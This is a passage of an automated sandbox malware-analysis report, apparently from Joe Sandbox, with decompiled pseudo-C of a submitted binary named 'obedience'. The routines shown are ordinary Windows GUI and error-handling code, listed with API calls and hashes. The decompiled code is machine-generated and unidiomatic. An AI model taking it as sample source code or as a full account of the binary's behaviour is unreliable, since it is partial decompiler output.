      0x00000000
      0x00000000
      0x00448eae
      0x00448eae
      0x00448eaf
      0x00448eaf
      0x00448e61
      0x00448eb2
      0x00448eb6
      0x00448ebf
      0x00448ebf
      0x00448eca
      0x00448e2b
      0x00448e32
      0x00448e32
      0x00448ed6
      0x00448edd
      0x00448ee0
      0x00448ee3
      0x00448ee8
      0x00448eef
      0x00000000
      0x00448efe
      0x00448f03

      APIs
      • BeginPaint.USER32(00000000,?), ref: 00448E0A
      • SaveDC.GDI32(?), ref: 00448E3E
      • ExcludeClipRect.GDI32(?,?,?,?,?,00000000,00448F04), ref: 00448EA0
      • RestoreDC.GDI32(?,?), ref: 00448ECA
      • EndPaint.USER32(00000000,?,00448F0B), ref: 00448EFE
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Paint$BeginClipExcludeRectRestoreSave
      • String ID:
      • API String ID: 3808407030-0
      • Opcode ID: 020c9d7ffcdd9e2b5038337da80e0f03f62c0b5d0891f93bf1a1afd5109ac8ba
      • Instruction ID: 48f513e9495aa45a6b0e8934a38842617bd31a5612fecb18929df95e2f29eeb7
      • Opcode Fuzzy Hash: 020c9d7ffcdd9e2b5038337da80e0f03f62c0b5d0891f93bf1a1afd5109ac8ba
      • Instruction Fuzzy Hash: FF414D70A00204AFDB10DF99C884E9EB7F9AF48704F2584AEE904D7366DB39AD45CB54
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0041C700 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 95COMMON
      Download Yara Rule
      C-Code - Quality: 82%
      			E0041C700(void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi, void* _a4, signed short _a8) {
				char _v5;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _t29;
				void* _t62;
				void* _t63;
				intOrPtr _t67;
				intOrPtr _t69;
				char _t70;
				intOrPtr _t73;
				void* _t86;
				void* _t88;
				void* _t89;
				intOrPtr _t90;

				_t70 = __edx;
				_t63 = __ecx;
				_t88 = _t89;
				_t90 = _t89 + 0xffffffdc;
				_v36 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				if(__edx != 0) {
					_t90 = _t90 + 0xfffffff0;
					_t29 = E00403F68(_t29, _t88);
				}
				_t86 = _t63;
				_v5 = _t70;
				_t62 = _t29;
				_t84 = _a8;
				_push(_t88);
				_push(0x41c829);
				_push( *[fs:eax]);
				 *[fs:eax] = _t90;
				if(_a8 != 0xffff) {
					E0041C5F8(E0040967C(_t86, _t84 & 0x0000ffff), 0);
					if( *((intOrPtr*)(_t62 + 4)) < 0) {
						E00409988(_t86,  &_v36);
						_v24 = _v36;
						_v20 = 0xb;
						E0040C3D4(GetLastError(),  &_v40);
						_v16 = _v40;
						_v12 = 0xb;
						_t67 =  *0x48f52c; // 0x415d38
						E0040CCE4(_t62, _t67, 1, _t84, _t86, 1,  &_v24);
						E004043D0();
					}
				} else {
					E0041C5F8(E004096F8(), 0);
					if( *((intOrPtr*)(_t62 + 4)) < 0) {
						E00409988(_t86,  &_v28);
						_v24 = _v28;
						_v20 = 0xb;
						E0040C3D4(GetLastError(),  &_v32);
						_v16 = _v32;
						_v12 = 0xb;
						_t69 =  *0x48f9d8; // 0x415d30
						E0040CCE4(_t62, _t69, 1, _t84, _t86, 1,  &_v24);
						E004043D0();
					}
				}
				_pop(_t73);
				 *[fs:eax] = _t73;
				_push(E0041C830);
				return E00404A64( &_v40, 4);
			}























      0x0041c700
      0x0041c700
      0x0041c701
      0x0041c703
      0x0041c70b
      0x0041c70e
      0x0041c711
      0x0041c714
      0x0041c719
      0x0041c71b
      0x0041c71e
      0x0041c71e
      0x0041c723
      0x0041c725
      0x0041c728
      0x0041c72a
      0x0041c72f
      0x0041c730
      0x0041c735
      0x0041c738
      0x0041c740
      0x0041c7bb
      0x0041c7c4
      0x0041c7cb
      0x0041c7d3
      0x0041c7d6
      0x0041c7e2
      0x0041c7ea
      0x0041c7ed
      0x0041c7f7
      0x0041c804
      0x0041c809
      0x0041c809
      0x0041c742
      0x0041c752
      0x0041c75b
      0x0041c766
      0x0041c76e
      0x0041c771
      0x0041c77d
      0x0041c785
      0x0041c788
      0x0041c792
      0x0041c79f
      0x0041c7a4
      0x0041c7a4
      0x0041c75b
      0x0041c810
      0x0041c813
      0x0041c816
      0x0041c828

      APIs
      • GetLastError.KERNEL32(00000000,0041C829,?,?,00417C74,00000001), ref: 0041C775
        • Part of subcall function 0040967C: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,00417C74,0041C7B5,00000000,0041C829,?,?,00417C74), ref: 004096CA
        • Part of subcall function 00409988: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,00417C74,0041C7D0,00000000,0041C829,?,?,00417C74,00000001), ref: 004099A7
      • GetLastError.KERNEL32(00000000,0041C829,?,?,00417C74,00000001), ref: 0041C7DA
        • Part of subcall function 0040C3D4: FormatMessageA.KERNEL32(00003200,00000000,00000000,00000000,?,00000100,00000000,00000000,0040E24E,00000000,0040E2A8), ref: 0040C3F3
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: ErrorLast$CreateFileFormatFullMessageNamePath
      • String ID: 0]A$8]A$toA
      • API String ID: 1652710734-1791751054
      • Opcode ID: a7813c119f33920a09d2efcb335686bb1fe20de70dcddbfc23b9cde6ab463027
      • Instruction ID: e6f533b28651a76b36b8ca087b3115b0fddf3e8d0f29a2853d18baa0149197ef
      • Opcode Fuzzy Hash: a7813c119f33920a09d2efcb335686bb1fe20de70dcddbfc23b9cde6ab463027
      • Instruction Fuzzy Hash: D7314070A042059FDB00EFAAC8816DEB7F5AB49314F50857AE804F7381D7795D458BA9
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00435F10 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
      Download Yara Rule
      C-Code - Quality: 76%
      			E00435F10(void* __eax, void* __ebx, intOrPtr __ecx, int __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				char _v12;
				long _t27;
				long _t34;
				int _t42;
				int _t43;
				intOrPtr _t50;
				int _t54;
				void* _t57;
				void* _t60;

				_v12 = 0;
				_v8 = __ecx;
				_t54 = __edx;
				_t57 = __eax;
				_push(_t60);
				_push(0x435ffb);
				_push( *[fs:eax]);
				 *[fs:eax] = _t60 + 0xfffffff8;
				if(__edx >= 0) {
					_t42 = SendMessageA(E0044B158( *((intOrPtr*)(__eax + 0x10))), 0xbb, __edx, 0);
					if(_t42 < 0) {
						_t43 = SendMessageA(E0044B158( *((intOrPtr*)(_t57 + 0x10))), 0xbb, _t54 - 1, 0);
						if(_t43 >= 0) {
							_t27 = SendMessageA(E0044B158( *((intOrPtr*)(_t57 + 0x10))), 0xc1, _t43, 0);
							if(_t27 != 0) {
								_t42 = _t43 + _t27;
								E00404D4C( &_v12, _v8, 0x436014);
								goto L6;
							}
						}
					} else {
						E00404D4C( &_v12, 0x436014, _v8);
						L6:
						SendMessageA(E0044B158( *((intOrPtr*)(_t57 + 0x10))), 0xb1, _t42, _t42);
						_t34 = E00404F00(_v12);
						SendMessageA(E0044B158( *((intOrPtr*)(_t57 + 0x10))), 0xc2, 0, _t34);
					}
				}
				_pop(_t50);
				 *[fs:eax] = _t50;
				_push(0x436002);
				return E00404A40( &_v12);
			}













      0x00435f1b
      0x00435f1e
      0x00435f21
      0x00435f23
      0x00435f27
      0x00435f28
      0x00435f2d
      0x00435f30
      0x00435f35
      0x00435f51
      0x00435f55
      0x00435f80
      0x00435f84
      0x00435f97
      0x00435f9e
      0x00435fa0
      0x00435fad
      0x00000000
      0x00435fad
      0x00435f9e
      0x00435f57
      0x00435f62
      0x00435fb2
      0x00435fc2
      0x00435fca
      0x00435fe0
      0x00435fe0
      0x00435f55
      0x00435fe7
      0x00435fea
      0x00435fed
      0x00435ffa

      APIs
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: MessageSend
      • String ID:
      • API String ID: 3850602802-0
      • Opcode ID: 9e6577b5db2e91a70072632bf5935b72bfb24d59dcac6a6ba5ae8583d1ee9809
      • Instruction ID: 68da375012344e4d9b8b7edda4ef64647927641f7b8bf6a44e6f2e66def988c5
      • Opcode Fuzzy Hash: 9e6577b5db2e91a70072632bf5935b72bfb24d59dcac6a6ba5ae8583d1ee9809
      • Instruction Fuzzy Hash: D7217170A447046BE720FBA6CC96F5F77B8EB84704F50883A7600A76C1DB78ED048669
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00464288 Relevance: 7.6, APIs: 5, Instructions: 73windowCOMMON
      Download Yara Rule
      C-Code - Quality: 100%
      			E00464288(void* __eax, void* __ecx, struct HWND__** __edx) {
				intOrPtr _t11;
				intOrPtr _t20;
				void* _t30;
				void* _t31;
				void* _t33;
				struct HWND__** _t34;
				struct HWND__* _t35;
				struct HWND__* _t36;

				_t31 = __ecx;
				_t34 = __edx;
				_t33 = __eax;
				_t30 = 0;
				_t11 =  *((intOrPtr*)(__edx + 4));
				if(_t11 < 0x100 || _t11 > 0x108) {
					L16:
					return _t30;
				} else {
					_t35 = GetCapture();
					if(_t35 != 0) {
						if(GetWindowLongA(_t35, 0xfffffffa) ==  *0x490664 && SendMessageA(_t35, _t34[1] + 0xbc00, _t34[2], _t34[3]) != 0) {
							_t30 = 1;
						}
						goto L16;
					}
					_t36 =  *_t34;
					_t20 =  *((intOrPtr*)(_t33 + 0x44));
					if(_t20 == 0 || _t36 !=  *((intOrPtr*)(_t20 + 0x254))) {
						L7:
						if(E004417EC(_t36, _t31) == 0 && _t36 != 0) {
							_t36 = GetParent(_t36);
							goto L7;
						}
						if(_t36 == 0) {
							_t36 =  *_t34;
						}
						goto L11;
					} else {
						_t36 = E0044B158(_t20);
						L11:
						if(SendMessageA(_t36, _t34[1] + 0xbc00, _t34[2], _t34[3]) != 0) {
							_t30 = 1;
						}
						goto L16;
					}
				}
			}











      0x00464288
      0x0046428c
      0x0046428e
      0x00464290
      0x00464292
      0x0046429a
      0x00464339
      0x0046433f
      0x004642ab
      0x004642b0
      0x004642b4
      0x0046431a
      0x00464337
      0x00464337
      0x00000000
      0x0046431a
      0x004642b6
      0x004642b8
      0x004642bd
      0x004642d8
      0x004642e1
      0x004642d6
      0x00000000
      0x004642d6
      0x004642e9
      0x004642eb
      0x004642eb
      0x00000000
      0x004642c7
      0x004642cc
      0x004642ed
      0x00464306
      0x00464308
      0x00464308
      0x00000000
      0x00464306
      0x004642bd

      APIs
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: MessageSend$CaptureLongWindow
      • String ID:
      • API String ID: 1158686931-0
      • Opcode ID: abc1d7aa98873f61f31f0c32c8acddfb31a1a65e2eb05e989299b2359190fbc9
      • Instruction ID: 9784f6399ca2f31a262f42a6aa994aa0f0fe5810ed2db42d249e98e557581eba
      • Opcode Fuzzy Hash: abc1d7aa98873f61f31f0c32c8acddfb31a1a65e2eb05e989299b2359190fbc9
      • Instruction Fuzzy Hash: 24114975304609DFAA60BE9A8980A2773DC9F94354B20457BF959D3382FA28FC40836E
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0044CB24 Relevance: 7.6, APIs: 5, Instructions: 73COMMON
      Download Yara Rule
      C-Code - Quality: 22%
      			E0044CB24(void* __eax, void* __ecx) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr* _t14;
				intOrPtr* _t17;
				intOrPtr _t19;
				intOrPtr* _t21;
				intOrPtr* _t26;
				intOrPtr _t37;
				void* _t39;
				intOrPtr _t48;
				void* _t50;
				void* _t52;
				intOrPtr _t53;

				_t50 = _t52;
				_t53 = _t52 + 0xfffffff4;
				_t39 = __eax;
				if( *((short*)(__eax + 0x68)) == 0xffff) {
					return __eax;
				} else {
					_t14 =  *0x48f6b0; // 0x490904
					_t17 =  *0x48f6b0; // 0x490904
					_t19 =  *((intOrPtr*)( *_t17))(0xd,  *((intOrPtr*)( *_t14))(0xe, 1, 1, 1));
					_push(_t19);
					L0042CFD4();
					_v8 = _t19;
					_push(_t50);
					_push(0x44cbe4);
					_push( *[fs:eax]);
					 *[fs:eax] = _t53;
					_t21 =  *0x48f9b8; // 0x490b80
					E0042D014(_v8, E00462578( *_t21, __ecx,  *((short*)(__eax + 0x68))));
					_t26 =  *0x48f9b8; // 0x490b80
					E0042D014(_v8, E00462578( *_t26, __ecx,  *((short*)(_t39 + 0x68))));
					_push(0);
					_push(0);
					_push(0);
					_push(_v8);
					L0042D064();
					_push( &_v16);
					_push(0);
					L0042D074();
					_push(_v12);
					_push(_v16);
					_push(1);
					_push(_v8);
					L0042D064();
					_pop(_t48);
					 *[fs:eax] = _t48;
					_push(0x44cbeb);
					_t37 = _v8;
					_push(_t37);
					L0042CFDC();
					return _t37;
				}
			}

















      0x0044cb25
      0x0044cb27
      0x0044cb2b
      0x0044cb32
      0x0044cbef
      0x0044cb38
      0x0044cb40
      0x0044cb4c
      0x0044cb53
      0x0044cb55
      0x0044cb56
      0x0044cb5b
      0x0044cb60
      0x0044cb61
      0x0044cb66
      0x0044cb69
      0x0044cb70
      0x0044cb81
      0x0044cb8a
      0x0044cb9b
      0x0044cba0
      0x0044cba2
      0x0044cba4
      0x0044cba9
      0x0044cbaa
      0x0044cbb2
      0x0044cbb3
      0x0044cbb5
      0x0044cbbd
      0x0044cbc1
      0x0044cbc2
      0x0044cbc7
      0x0044cbc8
      0x0044cbcf
      0x0044cbd2
      0x0044cbd5
      0x0044cbda
      0x0044cbdd
      0x0044cbde
      0x0044cbe3
      0x0044cbe3

      APIs
      • 6F8D7CB0.COMCTL32(00000000), ref: 0044CB56
        • Part of subcall function 0042D014: 6F8D0620.COMCTL32(004429C2,000000FF,00000000,0044CB86,00000000,0044CBE4,?,00000000), ref: 0042D018
      • 6F92BC60.COMCTL32(004429C2,00000000,00000000,00000000,00000000,0044CBE4,?,00000000), ref: 0044CBAA
      • 6F92B6C0.COMCTL32(00000000,?,004429C2,00000000,00000000,00000000,00000000,0044CBE4,?,00000000), ref: 0044CBB5
      • 6F92BC60.COMCTL32(004429C2,00000001,?,0044CC4D,00000000,?,004429C2,00000000,00000000,00000000,00000000,0044CBE4,?,00000000), ref: 0044CBC8
      • 6F8D7D50.COMCTL32(004429C2,0044CBEB,0044CC4D,00000000,?,004429C2,00000000,00000000,00000000,00000000,0044CBE4,?,00000000), ref: 0044CBDE
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: D0620
      • String ID:
      • API String ID: 1882524874-0
      • Opcode ID: 317f5cf8a15963b9bfd1066e22afc9acd74bf1e3930a3924ac04c79888505aa5
      • Instruction ID: 1d07dbf0ba8fdc1f6aae7a58e941b7a477ed210d26d145e5797f5572df9a215b
      • Opcode Fuzzy Hash: 317f5cf8a15963b9bfd1066e22afc9acd74bf1e3930a3924ac04c79888505aa5
      • Instruction Fuzzy Hash: 86214C75B44204BFEB10EBA8DC82F5D73E8EB09B04F5004A5FA00EB2A1DA75ED41C759
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0042B1A8 Relevance: 7.6, APIs: 5, Instructions: 66windowCOMMON
      Download Yara Rule
      C-Code - Quality: 78%
      			E0042B1A8(struct HPALETTE__* __eax) {
				struct HPALETTE__* _t21;
				char _t28;
				signed int _t30;
				struct HPALETTE__* _t36;
				struct HPALETTE__* _t37;
				struct HDC__* _t38;
				intOrPtr _t39;

				_t21 = __eax;
				_t36 = __eax;
				_t39 =  *((intOrPtr*)(__eax + 0x28));
				if( *((char*)(__eax + 0x30)) == 0 &&  *(_t39 + 0x10) == 0 &&  *((intOrPtr*)(_t39 + 0x14)) != 0) {
					_t22 =  *((intOrPtr*)(_t39 + 0x14));
					if( *((intOrPtr*)(_t39 + 0x14)) ==  *((intOrPtr*)(_t39 + 8))) {
						E00429C00(_t22);
					}
					_t21 = E004275F4( *((intOrPtr*)(_t39 + 0x14)), 1 <<  *(_t39 + 0x3e));
					_t37 = _t21;
					 *(_t39 + 0x10) = _t37;
					if(_t37 == 0) {
						_push(0);
						L00407658();
						_t21 = E00426EF8(_t21);
						_t38 = _t21;
						if( *((char*)(_t39 + 0x71)) != 0) {
							L9:
							_t28 = 1;
						} else {
							_push(0xc);
							_push(_t38);
							L00407348();
							_push(0xe);
							_push(_t38);
							L00407348();
							_t30 = _t21 * _t21;
							_t21 = ( *(_t39 + 0x2a) & 0x0000ffff) * ( *(_t39 + 0x28) & 0x0000ffff);
							if(_t30 < _t21) {
								goto L9;
							} else {
								_t28 = 0;
							}
						}
						 *((char*)(_t39 + 0x71)) = _t28;
						if(_t28 != 0) {
							_t21 = CreateHalftonePalette(_t38);
							 *(_t39 + 0x10) = _t21;
						}
						_push(_t38);
						_push(0);
						L004078C0();
						if( *(_t39 + 0x10) == 0) {
							 *((char*)(_t36 + 0x30)) = 1;
							return _t21;
						}
					}
				}
				return _t21;
			}










      0x0042b1a8
      0x0042b1ac
      0x0042b1ae
      0x0042b1b5
      0x0042b1cf
      0x0042b1d5
      0x0042b1d7
      0x0042b1d7
      0x0042b1ee
      0x0042b1f3
      0x0042b1f5
      0x0042b1fa
      0x0042b1fc
      0x0042b1fe
      0x0042b203
      0x0042b208
      0x0042b20e
      0x0042b237
      0x0042b237
      0x0042b210
      0x0042b210
      0x0042b212
      0x0042b213
      0x0042b21a
      0x0042b21c
      0x0042b21d
      0x0042b222
      0x0042b22d
      0x0042b231
      0x00000000
      0x0042b233
      0x0042b233
      0x0042b233
      0x0042b231
      0x0042b239
      0x0042b23e
      0x0042b241
      0x0042b246
      0x0042b246
      0x0042b249
      0x0042b24a
      0x0042b24c
      0x0042b255
      0x0042b257
      0x00000000
      0x0042b257
      0x0042b255
      0x0042b1fa
      0x0042b25f

      APIs
      • 73BEAC50.USER32(00000000,?,?,?,?,00429DD7,00000000,00429E63), ref: 0042B1FE
      • 73BEAD70.GDI32(00000000,0000000C,00000000,?,?,?,?,00429DD7,00000000,00429E63), ref: 0042B213
      • 73BEAD70.GDI32(00000000,0000000E,00000000,0000000C,00000000,?,?,?,?,00429DD7,00000000,00429E63), ref: 0042B21D
      • CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,00429DD7,00000000,00429E63), ref: 0042B241
      • 73BEB380.USER32(00000000,00000000,00000000,?,?,?,?,00429DD7,00000000,00429E63), ref: 0042B24C
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: B380CreateHalftonePalette
      • String ID:
      • API String ID: 178651289-0
      • Opcode ID: 559da552b48e6d3ee41e7dc89cf2b571fbfc4dbf88e11fe7153bf1a347e389a4
      • Instruction ID: 22fab76b6008ebf0b826f02d2bff6e098fe8313a2446bab708ef7e92ffb450ad
      • Opcode Fuzzy Hash: 559da552b48e6d3ee41e7dc89cf2b571fbfc4dbf88e11fe7153bf1a347e389a4
      • Instruction Fuzzy Hash: 6A11B431705369DADB24EF65A4497EF3790FF51394F80016AFC00A6681D7B89C94C3EA
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0046176C Relevance: 7.6, APIs: 5, Instructions: 63COMMON
      Download Yara Rule
      C-Code - Quality: 62%
      			E0046176C(void* __eax) {
				void* _t16;
				void* _t37;
				void* _t38;
				signed int _t41;

				_t16 = __eax;
				_t38 = __eax;
				if(( *(__eax + 0x1c) & 0x00000010) == 0 &&  *0x48ee20 != 0) {
					_t16 = E0044B45C(__eax);
					if(_t16 != 0) {
						_t41 = GetWindowLongA(E0044B158(_t38), 0xffffffec);
						if( *((char*)(_t38 + 0x2e0)) != 0 ||  *((char*)(_t38 + 0x2e8)) != 0) {
							if((_t41 & 0x00080000) == 0) {
								SetWindowLongA(E0044B158(_t38), 0xffffffec, _t41 | 0x00080000);
							}
							return  *0x48ee20(E0044B158(_t38),  *((intOrPtr*)(_t38 + 0x2ec)),  *((intOrPtr*)(_t38 + 0x2e1)),  *0x0048EEA4 |  *0x0048EEAC);
						} else {
							SetWindowLongA(E0044B158(_t38), 0xffffffec, _t41 & 0xfff7ffff);
							_push(0x485);
							_push(0);
							_push(0);
							_t37 = E0044B158(_t38);
							_push(_t37);
							L00407898();
							return _t37;
						}
					}
				}
				return _t16;
			}







      0x0046176c
      0x0046176e
      0x00461774
      0x00461789
      0x00461790
      0x004617a5
      0x004617ae
      0x004617bf
      0x004617d2
      0x004617d2
      0x00000000
      0x00461814
      0x00461825
      0x0046182a
      0x0046182f
      0x00461831
      0x00461835
      0x0046183a
      0x0046183b
      0x00000000
      0x0046183b
      0x004617ae
      0x00461790
      0x00461842

      APIs
      • GetWindowLongA.USER32 ref: 004617A0
      • SetWindowLongA.USER32 ref: 004617D2
      • SetLayeredWindowAttributes.USER32(00000000,?,?,00000000,00000000,000000EC,?,?,0045F358), ref: 0046180C
      • SetWindowLongA.USER32 ref: 00461825
      • 73BEB330.USER32(00000000,00000000,00000000,00000485,00000000,000000EC,00000000,00000000,000000EC,?,?,0045F358), ref: 0046183B
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Window$Long$AttributesB330Layered
      • String ID:
      • API String ID: 1770052509-0
      • Opcode ID: 9bef555e0ba252e4f153bee74b45bab7266b7c42411ec9f6e12ee93a07049bbd
